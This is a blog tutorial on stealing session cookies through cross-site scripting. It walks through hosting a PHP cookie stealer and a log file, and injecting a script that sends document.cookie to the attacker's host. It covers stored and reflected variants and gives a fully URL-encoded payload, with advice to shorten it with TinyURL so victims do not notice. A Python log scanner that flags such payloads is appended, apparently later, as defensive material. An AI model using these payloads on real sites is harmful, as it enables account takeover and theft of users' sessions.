Cookie Stealing From Cross Site Scripting ( xss ) Attack

Hello guys. In this post I will show how cookie stealing through a cross-site scripting (XSS) attack works and how an attacker can steal cookies from users. I hope you are familiar with XSS; if not, please read our basic XSS tutorial.

Prerequisites:

  • Cookie stealer code: Get It From Here
  • Free web hosting.
  • Basic knowledge of XSS attacks.

Cookie stealing is the process in which an attacker exploits an XSS vulnerability and steals the cookies of victims who visit the infected link. These cookies are then used to compromise their accounts.

Creating PHP Cookie Stealer

  • Copy the cookie stealer code from here.
  • Open Notepad or any editor and paste the code.
  • Save the file with a .php extension, e.g. xss.php.

Now create a new file and save it as log.txt (leave it blank). Don't change the name; this is the file name given in the PHP file.

Now we have two files:

  1) xss.php
  2) log.txt

Hosting Cookie Stealer and Log file

Now we have to host both files. You can use free web hosting or secure tunnelling. After hosting, the stealer will be at: www.domain.com/xss.php

Cookie Stealing From Cross Site Scripting ( xss ) Attack

Now that everything is set up, we have to find a vulnerable website into which we can inject our malicious code.

<script>location.href = 'http://www.site.com/xss.php?cookie='+document.cookie;</script>

Cookie Stealing with Stored vs Reflected XSS:

Stored: If this code is injected into a site vulnerable to persistent XSS, it stays there until the admin finds it. It is shown to all users, so the attacker doesn't need to send a link to anyone. Whoever visits the page becomes a victim.

Reflected: In a non-persistent attack, the attacker sends the link to victims. Whenever they follow the link, it steals the cookie. Most sites are vulnerable to reflected XSS.

In a reflected attack, the attacker sends the injected link to victims.
For example:
hxxp://www.VulnerableSite.com/index.php?search=<script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>

The above link clearly shows the script. An attacker can URL-encode the script and shorten the link with a URL-shortening service such as TinyURL before sending it to the victim.

http://www.Site.com/index.php?search=%3c%73%63%72%69%70%74%3e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%3a%2f%2f%77%77%77%2e%59%6f%75%72%73%69%74%65%2e%63%6f%6d%2f%53%74%65%61%6c%65%72%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%3c%2f%73%63%72%69%70%74%3e

Once the victim opens the link, his/her cookie will be stored in the log.txt file.
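On the defending side, the encoded link above still leaves a recognisable trace in the vulnerable site's access log. The following is an added example, not part of the original post: it percent-decodes every query parameter (repeatedly, so double-encoded values are caught too) and flags requests where a parameter carries a script tag that reads document.cookie. The log lines, client addresses, the collector.example host and all function names are constructed for illustration.

```python
import re
from urllib.parse import quote, unquote

REQUEST = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+"')
INDICATORS = {
    "script-tag": re.compile(r"<\s*script\b", re.I),
    "cookie-read": re.compile(r"document\s*\.\s*cookie", re.I),
    "redirect": re.compile(r"location\s*(\.\s*href)?\s*=", re.I),
}

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded values are normalised too."""
    for _ in range(max_rounds):
        if (decoded := unquote(value)) == value:
            break
        value = decoded
    return value

def inspect_target(target):
    """Return {parameter: [indicator names]} for parameters whose decoded
    value contains a script tag that reads document.cookie."""
    hits = {}
    query = target.partition("?")[2].partition("#")[0]
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        value = fully_decode(raw)
        found = [k for k, rx in INDICATORS.items() if rx.search(value)]
        if "script-tag" in found and "cookie-read" in found:
            hits[name] = found
    return hits

def scan(lines):
    """Return (client, parameter, indicators) for each suspicious log line."""
    results = []
    for m in filter(None, map(REQUEST.match, lines)):
        results += [(m.group(1), p, f) for p, f in inspect_target(m.group(2)).items()]
    return results

# Constructed sample data: the post's payload shape, single- and double-encoded.
PAYLOAD = "<script>location.href = 'http://collector.example/xss.php?cookie='+document.cookie;</script>"
ENCODED = "".join(f"%{ord(c):02x}" for c in PAYLOAD)
SAMPLE_LOG = [
    f'198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?search={ENCODED} HTTP/1.1" 200 512',
    f'198.51.100.8 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?search={quote(ENCODED)} HTTP/1.1" 200 512',
    '198.51.100.9 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?search=cookie+recipes HTTP/1.1" 200 498',
]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

A hit here means a request carried the payload, not that it executed; whether the cookie was exposed depends on the page echoing the parameter unescaped and on the session cookie lacking the HttpOnly flag.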

 

Author: Ahmed Raza Memon

I am a 17-year-old Ethical Hacker, Penetration Tester, Web Security Expert and Exploit Writer from India. My area of expertise includes Ethical Hacking, Vulnerability Assessment, Information Security Audits, Penetration Testing, Exploit Writing, Web Application Security, Source Code Reviews, Forensic Investigation and Cyber Law. I have been acknowledged by many top companies like Microsoft, Apple, SAP, AOL, Sony and many more...
